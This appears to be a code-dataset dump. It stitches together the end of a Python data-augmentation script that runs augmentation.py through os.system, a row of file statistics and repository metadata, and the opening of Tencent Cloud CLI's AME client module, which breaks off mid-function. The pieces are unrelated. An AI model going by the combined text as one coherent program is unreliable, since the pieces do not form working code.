os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_1_3 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_2_4 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_1_5 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_2_6 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_1_7 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_2_8 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_1_9 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_2_10 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_1_11 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_2_12 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_1_13 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_2_14 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_1_15 | tee -a output.txt ')
#print("translating 2: " + fileName)
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_1_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_2_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_3_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_4_2 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_5_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_6_2 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_7_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_8_2 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_9_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_10_2 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_11_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_12_2 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_13_1 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_14_2 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_15_1 | tee -a output.txt ')
#print("translating 3: " + fileName)
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_3_3 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_4_4 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_5_5 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_6_6 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_7_7 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_8_8 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_9_9 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' trans_10_10 | tee -a output.txt ')
#print("adding random noise to: " + fileName)
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' noise_0.01 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' noise_0.02 | tee -a output.txt ')
#print("zooming: " + fileName)
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' zoom_-3_-3_-3_-3 | tee -a output.txt ')
os.system('python -W ignore augmentation.py ../dataset/segmented/' + fileName + ' zoom_-5_-5_-5_-5 | tee -a output.txt ')
print("augmented folder (" + fileName + ") successfully")
print("--------")
| 88.4875 | 122 | 0.691906 | 1,015 | 7,079 | 4.726108 | 0.055172 | 0.048364 | 0.120909 | 0.157182 | 0.956223 | 0.947676 | 0.924119 | 0.924119 | 0.924119 | 0.924119 | 0 | 0.021154 | 0.138579 | 7,079 | 79 | 123 | 89.607595 | 0.765497 | 0.04591 | 0 | 0.032787 | 0 | 0 | 0.7311 | 0.177438 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.016393 | 0 | 0.016393 | 0.032787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1c811881399a5a4658964c650b2665b48c8615d9 | 57,993 | py | Python | tccli/services/ame/ame_client.py | HS-Gray/tencentcloud-cli | 3822fcfdfed570fb526fe49abe6793e2f9127f4a | [
"Apache-2.0"
] | 47 | 2018-05-31T11:26:25.000Z | 2022-03-08T02:12:45.000Z | tccli/services/ame/ame_client.py | HS-Gray/tencentcloud-cli | 3822fcfdfed570fb526fe49abe6793e2f9127f4a | [
"Apache-2.0"
] | 23 | 2018-06-14T10:46:30.000Z | 2022-02-28T02:53:09.000Z | tccli/services/ame/ame_client.py | HS-Gray/tencentcloud-cli | 3822fcfdfed570fb526fe49abe6793e2f9127f4a | [
"Apache-2.0"
] | 22 | 2018-10-22T09:49:45.000Z | 2022-03-30T08:06:04.000Z | # -*- coding: utf-8 -*-
import os
import sys
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError, ClientError, ParamError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.ame.v20190916 import ame_client as ame_client_v20190916
from tencentcloud.ame.v20190916 import models as models_v20190916
from jmespath import search
import time
from tccli import six
def doDescribeKTVMusicDetail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeKTVMusicDetailRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeKTVMusicDetail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeItemById(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeItemByIdRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeItemById(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeStations(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeStationsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeStations(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePackages(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePackagesRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribePackages(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeLyric(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeLyricRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeLyric(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMusicSaleStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeMusicSaleStatusRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeMusicSaleStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeItems(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeItemsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeItems(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeKTVPlaylistDetail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeKTVPlaylistDetailRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeKTVPlaylistDetail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAuthInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAuthInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeAuthInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeKTVPlaylists(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.AmeClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeKTVPlaylistsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeKTVPlaylists(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMusic(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
